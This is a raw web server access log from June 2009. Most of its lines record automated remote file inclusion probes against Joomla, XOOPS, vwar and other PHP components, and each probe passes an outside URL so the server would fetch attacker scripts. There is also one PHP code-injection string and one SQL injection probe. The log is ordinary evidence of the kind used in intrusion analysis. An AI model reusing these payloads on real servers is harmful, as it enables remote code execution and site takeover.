200.54.154.10 - - [21/Jun/2009:07:25:50 -0400] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
219.94.194.231 - - [21/Jun/2009:07:25:51 -0400] "GET /logs/access_log.Q109061000///vwar/backup/errors.php?error=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:07:25:52 -0400] "GET ///vwar/backup/errors.php?error=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:07:25:52 -0400] "GET /logs///vwar/backup/errors.php?error=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
173.15.28.165 - - [21/Jun/2009:07:26:10 -0400] "GET /logs/access_log.Q109052800//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.louangefm.fr//administrator/components/tirid.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
173.15.28.165 - - [21/Jun/2009:07:26:10 -0400] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.louangefm.fr//administrator/components/tirid.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
173.15.28.165 - - [21/Jun/2009:07:26:10 -0400] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.louangefm.fr//administrator/components/tirid.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
173.15.28.165 - - [21/Jun/2009:07:26:14 -0400] "GET /logs/error_log.Q109052800//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.louangefm.fr//administrator/components/tirid.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
91.149.157.130 - - [21/Jun/2009:07:26:33 -0400] "GET /logs/access_log.Q109060400%20%20//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
173.15.28.165 - - [21/Jun/2009:07:26:40 -0400] "GET /logs/error_log.Q109052800%20//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.louangefm.fr//administrator/components/tirid.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
213.229.60.50 - - [21/Jun/2009:07:27:33 -0400] "GET /logs/access_log.Q109061100/convert/mvcw.php?vwar_root=http://MiNgOnIsHoW.altervista.org/A51/id.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.63"
213.229.60.50 - - [21/Jun/2009:07:27:33 -0400] "GET /convert/mvcw.php?vwar_root=http://MiNgOnIsHoW.altervista.org/A51/id.txt???? HTTP/1.1" 404 214 "-" "libwww-perl/5.63"
213.229.60.50 - - [21/Jun/2009:07:27:34 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://MiNgOnIsHoW.altervista.org/A51/id.txt???? HTTP/1.1" 404 219 "-" "libwww-perl/5.63"
91.121.137.51 - - [21/Jun/2009:07:27:42 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.eyepro.net//assets/images/beast-test.txt?? HTTP/1.1" 404 242 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
91.121.137.51 - - [21/Jun/2009:07:27:42 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.eyepro.net//assets/images/beast-test.txt?? HTTP/1.1" 404 247 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
209.59.12.99 - - [21/Jun/2009:07:29:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
219.94.194.231 - - [21/Jun/2009:07:29:19 -0400] "GET /logs/access_log.Q109051000///vwar/backup/errors.php?error=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
213.171.225.234 - - [21/Jun/2009:07:30:55 -0400] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
213.171.225.234 - - [21/Jun/2009:07:30:55 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
213.171.225.234 - - [21/Jun/2009:07:30:58 -0400] "GET /logs/access_log.Q109060400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:07:32:25 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:07:32:25 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:07:32:25 -0400] "GET /logs/access_log.Q109052100//admin/spaw/spaw_control.class.php?spaw_root=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:07:32:37 -0400] "GET /logs/access_log.Q109061100//admin/spaw/spaw_control.class.php?spaw_root=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
213.189.224.21 - - [21/Jun/2009:07:33:25 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
213.189.224.21 - - [21/Jun/2009:07:33:25 -0400] "GET //modules/xfsection/modify.php?dir_module=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.811"
213.189.224.21 - - [21/Jun/2009:07:33:25 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
209.59.12.99 - - [21/Jun/2009:07:34:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.189.224.21 - - [21/Jun/2009:07:34:06 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
204.202.23.11 - - [21/Jun/2009:07:34:14 -0400] "GET /logs/access_log.Q109061000//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.eyepro.net//assets/images/prova-cmd.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.65"
204.202.23.11 - - [21/Jun/2009:07:34:14 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.eyepro.net//assets/images/prova-cmd.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
204.202.23.11 - - [21/Jun/2009:07:34:14 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.eyepro.net//assets/images/prova-cmd.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
204.202.23.11 - - [21/Jun/2009:07:34:41 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.eyepro.net//assets/images/prova-cmd.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
213.229.60.50 - - [21/Jun/2009:07:35:05 -0400] "GET /logs/access_log.Q109052900/convert/mvcw.php?vwar_root=http://MiNgOnIsHoW.altervista.org/A51/id.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.63"
91.149.157.130 - - [21/Jun/2009:07:35:06 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
204.202.23.11 - - [21/Jun/2009:07:35:07 -0400] "GET /logs/error_log.Q109061000//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.eyepro.net//assets/images/prova-cmd.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.65"
91.149.157.130 - - [21/Jun/2009:07:36:43 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:07:36:43 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:07:36:43 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
87.106.179.130 - - [21/Jun/2009:07:37:08 -0400] "GET /logs/access_log.Q109052800//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.louangefm.fr//administrator/components/tirid.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
87.106.179.130 - - [21/Jun/2009:07:37:08 -0400] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.louangefm.fr//administrator/components/tirid.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
87.106.179.130 - - [21/Jun/2009:07:37:08 -0400] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.louangefm.fr//administrator/components/tirid.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
87.106.179.130 - - [21/Jun/2009:07:37:21 -0400] "GET /logs/error_log.Q109052800//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.louangefm.fr//administrator/components/tirid.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
87.106.179.130 - - [21/Jun/2009:07:38:12 -0400] "GET /logs/error_log.Q109052800%20//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.louangefm.fr//administrator/components/tirid.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
65.96.104.30 - - [21/Jun/2009:07:38:17 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+PRTSRCH+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L409CEF4B80C2A2004A7F04Q+WEBSEQ(S0020):1+WEBPGN(S0070):173622+WEBID(S0020):1+WEBKEY(A0100):PRTITEMS HTTP/1.1" 200 50479 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):03" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
65.96.104.30 - - [21/Jun/2009:07:38:43 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+PRTSRCH+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L409CEF4B80C2A2004A7F04Q+WEBSEQ(S0020):1+WEBPGN(S0070):173622+WEBID(S0020):1+WEBKEY(A0100):PRTITEMS HTTP/1.1" 200 50479 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):03" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
209.59.12.99 - - [21/Jun/2009:07:39:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.54 - - [21/Jun/2009:07:39:21 -0400] "GET /images/over-index_bonemills.jpg HTTP/1.1" 200 2812 "-" "Googlebot-Image/1.0"
91.149.157.130 - - [21/Jun/2009:07:40:14 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.eyepro.net//assets/images/tanii??? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
209.59.12.99 - - [21/Jun/2009:07:44:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.123.143.252 - - [21/Jun/2009:07:44:58 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
66.249.71.54 - - [21/Jun/2009:07:47:23 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L409D394E8EF2220036BF04Y+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [21/Jun/2009:07:47:33 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [21/Jun/2009:07:47:33 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L409D394E8ED2220032BF04Y+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.122.6.62 - - [21/Jun/2009:07:47:41 -0400] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
222.122.6.62 - - [21/Jun/2009:07:47:41 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
222.122.6.62 - - [21/Jun/2009:07:47:41 -0400] "GET /logs/access_log.Q109060400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.122.6.62 - - [21/Jun/2009:07:47:41 -0400] "GET /logs/access_log.Q109060300//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
66.249.71.54 - - [21/Jun/2009:07:47:44 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L109DD5482092B3003E1E067+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [21/Jun/2009:07:47:54 -0400] "GET /logs/access_log.Q107103000 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [21/Jun/2009:07:47:56 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L409D394E8E32D20030BF04Y+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.158.98.196 - - [21/Jun/2009:07:48:02 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.eyepro.net//assets/images/prova-cmd.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
91.149.157.130 - - [21/Jun/2009:07:48:32 -0400] "GET /logs/access_log.Q109052900%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
218.158.98.196 - - [21/Jun/2009:07:48:40 -0400] "GET /logs/access_log.Q109061000//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.eyepro.net//assets/images/prova-cmd.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
218.158.98.196 - - [21/Jun/2009:07:48:41 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.eyepro.net//assets/images/prova-cmd.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
218.158.98.196 - - [21/Jun/2009:07:48:41 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.eyepro.net//assets/images/prova-cmd.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
209.59.12.99 - - [21/Jun/2009:07:49:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.158.98.196 - - [21/Jun/2009:07:49:31 -0400] "GET /logs/error_log.Q109061000//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.eyepro.net//assets/images/prova-cmd.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
91.149.157.130 - - [21/Jun/2009:07:50:19 -0400] "GET /logs/access_log.Q109060500//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
69.94.80.27 - - [21/Jun/2009:07:52:39 -0400] "GET //includes/db_connect.php?baseDir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
69.94.80.27 - - [21/Jun/2009:07:52:39 -0400] "GET /logs//includes/db_connect.php?baseDir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.94.80.27 - - [21/Jun/2009:07:52:39 -0400] "GET /logs/access_log.Q109052100//includes/db_connect.php?baseDir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
69.94.80.27 - - [21/Jun/2009:07:52:43 -0400] "GET /logs//includes/db_connect.php?baseDir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.94.80.27 - - [21/Jun/2009:07:52:43 -0400] "GET //includes/db_connect.php?baseDir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
69.94.80.27 - - [21/Jun/2009:07:52:43 -0400] "GET /logs/access_log.Q109052100//includes/db_connect.php?baseDir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.249.71.14 - - [21/Jun/2009:07:52:48 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L409D394E8E82720031BF04Y+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
151.1.154.24 - - [21/Jun/2009:07:52:49 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
151.1.154.24 - - [21/Jun/2009:07:52:49 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
151.1.154.24 - - [21/Jun/2009:07:52:49 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
69.94.80.27 - - [21/Jun/2009:07:53:05 -0400] "GET /logs/access_log.Q109052200//includes/db_connect.php?baseDir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
69.94.80.27 - - [21/Jun/2009:07:53:06 -0400] "GET /logs/access_log.Q109052200//includes/db_connect.php?baseDir=http://bidbpersonel.trakya.edu.tr/sgdb/iks_sistem/iks_dosyalar/d-sg/3/8/8.1/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
65.96.104.30 - - [21/Jun/2009:07:53:39 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
65.96.104.30 - - [21/Jun/2009:07:53:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
65.96.104.30 - - [21/Jun/2009:07:53:39 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
65.96.104.30 - - [21/Jun/2009:07:53:39 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
209.59.12.99 - - [21/Jun/2009:07:54:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.78.82.142 - - [21/Jun/2009:07:55:25 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:07:55:25 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:07:55:25 -0400] "GET /logs/access_log.Q109061000%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:07:55:31 -0400] "GET /logs/access_log.Q109050700%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
68.109.233.157 - - [21/Jun/2009:07:58:27 -0400] "GET /logs/access_log.Q109050800///?_[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
68.109.233.157 - - [21/Jun/2009:07:58:27 -0400] "GET ///?_[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
68.109.233.157 - - [21/Jun/2009:07:58:27 -0400] "GET /logs///?_[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 200 6382 "-" "libwww-perl/5.79"
68.109.233.157 - - [21/Jun/2009:07:59:07 -0400] "GET /logs/access_log.Q109051300///?_[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
66.249.71.14 - - [21/Jun/2009:07:59:13 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L409D394E8EA2B20037BF04Y+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.17.151 - - [21/Jun/2009:07:59:14 -0400] "GET /logs/error_log.Q108123000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [21/Jun/2009:07:59:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.74.143.62 - - [21/Jun/2009:08:00:02 -0400] "GET /index.php?module=My_eGallery&do=showpic&pid=' HTTP/1.0" 404 207 "-" "libwww-perl/5.805"
74.200.195.130 - - [21/Jun/2009:08:02:09 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:09 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:09 -0400] "GET /logs/access_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:13 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:14 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:14 -0400] "GET /logs/access_log.Q109061000%20%20//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:14 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:14 -0400] "GET /logs/access_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:14 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:15 -0400] "GET /logs/access_log.Q109061000%20%20//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:15 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:15 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:17 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:17 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:17 -0400] "GET /logs/access_log.Q109061000%20%20//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:24 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:24 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:24 -0400] "GET /logs/access_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:27 -0400] "GET /logs/error_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
